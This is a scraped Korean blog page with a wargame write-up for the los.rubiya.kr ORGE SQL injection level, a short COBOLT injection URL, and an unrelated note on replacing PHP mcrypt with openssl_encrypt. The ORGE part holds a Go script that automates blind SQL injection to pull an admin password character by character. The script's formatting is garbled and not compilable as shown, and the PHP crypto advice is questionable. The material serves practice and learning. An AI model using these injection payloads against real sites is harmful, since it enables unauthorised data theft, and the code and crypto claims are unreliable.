https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php?pw=

 

https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php?pw=7b751aec

 

los.rubiya.kr

package main

import(
    "bytes"
    "fmt"
    "io/ioutil"
    "log"
    "net/http"
    "regexp"
    "strconv"
    "time"
)

const COOKIEVALUE string = ""

var limit int = 50
var index int = 0
var payload[] string
var pwLength int = 0

func main() {
    //requestPost()
    getLength(50)
    fmt.Println(strconv.Itoa(pwLength))
    index = 0
    blidSqlInjection(0, 0)
    fmt.Println("%v", payload)
}

func matchFind(targetString string) bool {
        r,
        _: = regexp.Compile("

            Hello.*
            ")
            var result[] string

            result = r.FindAllString(targetString, -1) if len(result) > 0 {
                return true
            } else {
                return false
            }
        }

        func requestPost() {
            url: = "https://los.rubiya.kr/gate.php"

            data: = [] byte(`{"hello": "world"}`)

            req,
            err: = http.NewRequest("POST", url, bytes.NewBuffer(data))
            if err != nil {
                log.Fatal("Error reading request. ", err)
            }

            // Set headers
            req.Header.Set("Content-Type", "application/json")
            req.Header.Set("Host", "httpbin.org")

            // Create and Add cookie to request
            cookie: = http.Cookie {
                Name: "PHPSESSID",
                Value: COOKIEVALUE
            }
            req.AddCookie( & cookie)

            // Set client timeout
            client: = & http.Client {
                Timeout: time.Second * 10
            }

            // Validate cookie and headers are attached
            fmt.Println(req.Cookies())
            fmt.Println(req.Header)

            // Send request
            resp,
            err: = client.Do(req)
            if err != nil {
                log.Fatal("Error reading response. ", err)
            }
            defer resp.Body.Close()

            fmt.Println("response Status:", resp.Status)
            fmt.Println("response Headers:", resp.Header)

            body,
            err: = ioutil.ReadAll(resp.Body)
            if err != nil {
                log.Fatal("Error reading body. ", err)
            }

            fmt.Printf("%s\n", body)

        }

        func getLength(start int) int {
            //https://los.rubiya.kr/chall/orc_60e5b360f95c1f9688e4f3a86c5dd494.php?pw=%27%20or%20%20ascii(substr(pw,1,1))%3C150%23

            if index >= limit || start == 0 {
                return -1
            }
            //url1 := "https://los.rubiya.kr/chall/orc_60e5b360f95c1f9688e4f3a86c5dd494.php?pw=pw=%27%20or%20%20length(pw)="
            url1: = "https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php?pw=%27%20||%20id=%27admin%27%20%26%26%20length(pw)%3C20"
            url2: = strconv.Itoa(start) + "%23%27"

            data: = [] byte(`{"hello": "world"}`)

            url: = url1 + url2
            fmt.Println("Request URL : ", url)
            req, err: = http.NewRequest("GET", url, bytes.NewBuffer(data))
            if err != nil {
                log.Fatal("Error reading request. ", err)
            }

            // Set headers
            req.Header.Set("Content-Type", "application/json")

            // Create and Add cookie to request
            cookie: = http.Cookie {
                Name: "PHPSESSID",
                Value: COOKIEVALUE
            }
            req.AddCookie( & cookie)

            // Set client timeout
            client: = & http.Client {
                Timeout: time.Second * 10
            }

            // Send request
            resp, err: = client.Do(req)
            if err != nil {
                log.Fatal("Error reading response. ", err)
            }
            defer resp.Body.Close()

            //fmt.Println("response Status:", resp.Status)

            body, err: = ioutil.ReadAll(resp.Body)
            if err != nil {
                log.Fatal("Error reading body. ", err)
            }

            matchResult: = matchFind(string(body))

            if matchResult == true {
                fmt.Println("Length : ", strconv.Itoa(start))
                pwLength = start
                return start
            }

            index++

            if matchResult == true {
                getLength(start / 2)
            } else {
                getLength(start - 1)
            }

            return -1
        }

        func blidSqlInjection(start int, pwIndex int) int {
            //https://los.rubiya.kr/chall/orc_60e5b360f95c1f9688e4f3a86c5dd494.php?pw=%27%20or%20%20ascii(substr(pw,1,1))%3C150%23

            fmt.Println(index, start, pwLength, pwIndex)
            if start == pwLength && pwLength == pwIndex {
                return -1
            }

            if pwLength < pwIndex {
                return -1
            }
            url1: = "https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php?pw=%27%20||%20id=%27admin%27%20%26%26%20ascii(substr(pw," + strconv.Itoa(pwIndex) + ",1))="
            url2: = strconv.Itoa(start) + "%23%27"

            data: = [] byte(`{"hello": "world"}`)

            url: = url1 + url2
            fmt.Println("Request URL : ", url)
            req, err: = http.NewRequest("GET", url, bytes.NewBuffer(data))
            if err != nil {
                log.Fatal("Error reading request. ", err)
            }

            // Set headers
            req.Header.Set("Content-Type", "application/json")

            // Create and Add cookie to request
            cookie: = http.Cookie {
                Name: "PHPSESSID",
                Value: COOKIEVALUE
            }
            req.AddCookie( & cookie)

            // Set client timeout
            client: = & http.Client {
                Timeout: time.Second * 10
            }

            // Send request
            resp, err: = client.Do(req)
            if err != nil {
                log.Fatal("Error reading response. ", err)
            }
            defer resp.Body.Close()

            //fmt.Println("response Status:", resp.Status)

            body, err: = ioutil.ReadAll(resp.Body)
            if err != nil {
                log.Fatal("Error reading body. ", err)
            }

            matchResult: = matchFind(string(body))

            index++
            if matchResult == true {
                //fmt.Println("Length : ", strconv.Itoa(start))
                //return start
                payload = append(payload, string(start))
                blidSqlInjection(0, pwIndex + 1)
            } else {
                blidSqlInjection(start + 1, pwIndex)
            }

            return -1
        }

'War Game > LOS' 카테고리의 다른 글

LOS Cobolt  (0) 2019.06.10
LOS DARK_EYES  (0) 2015.10.24
LOS SUCCUBUS  (0) 2015.10.23
LOS ZOMBIE_ASSASSIN  (0) 2015.10.23
LOS ASSASSIN  (0) 2015.10.23

https://los.rubiya.kr/chall/cobolt_b876ab5595253427d3bc34f1cd8f30db.php?id=admin%27or%271&pw=fdsf

'War Game > LOS' 카테고리의 다른 글

LOS ORGE  (0) 2019.06.10
LOS DARK_EYES  (0) 2015.10.24
LOS SUCCUBUS  (0) 2015.10.23
LOS ZOMBIE_ASSASSIN  (0) 2015.10.23
LOS ASSASSIN  (0) 2015.10.23

PHP가 버전 업그레이드를 함에 따라 
레거시 버전 PHP에서 사용하던 mcrypt_encrypt 관련 암호화 함수들을 쓰기 힘들게 됬다



때문에 openssl_encrypt 함수를 


만약 레거시 코드에서 mcrypt_encrypt 암호화 방식에서 AES 암호화로 MCRYPT_RIJNDAEL_128를  사용했다면 


openssl_encrypt에선 AES-256-CBC로 사용하면 레거시 코드와 호환이 가능하다 



복호화도 동일 


php7.2부턴 mcrypt 사용이 불가능 하기 때문에 openssl_encrpyt를 써야 한다 
레거시 코드를 마이그레이션 할때 만약 mcrypt를 사용했다면 참고

저작자표시 비영리

'Web Development > PHP' 카테고리의 다른 글

Laravel에서 PHP CLI 실행  (0) 2018.12.20
MVC 패턴  (0) 2016.02.08
파일 업로드 기능을 구현할떄의 php.ini 설정  (0) 2016.02.08

+ Recent posts

티스토리툴바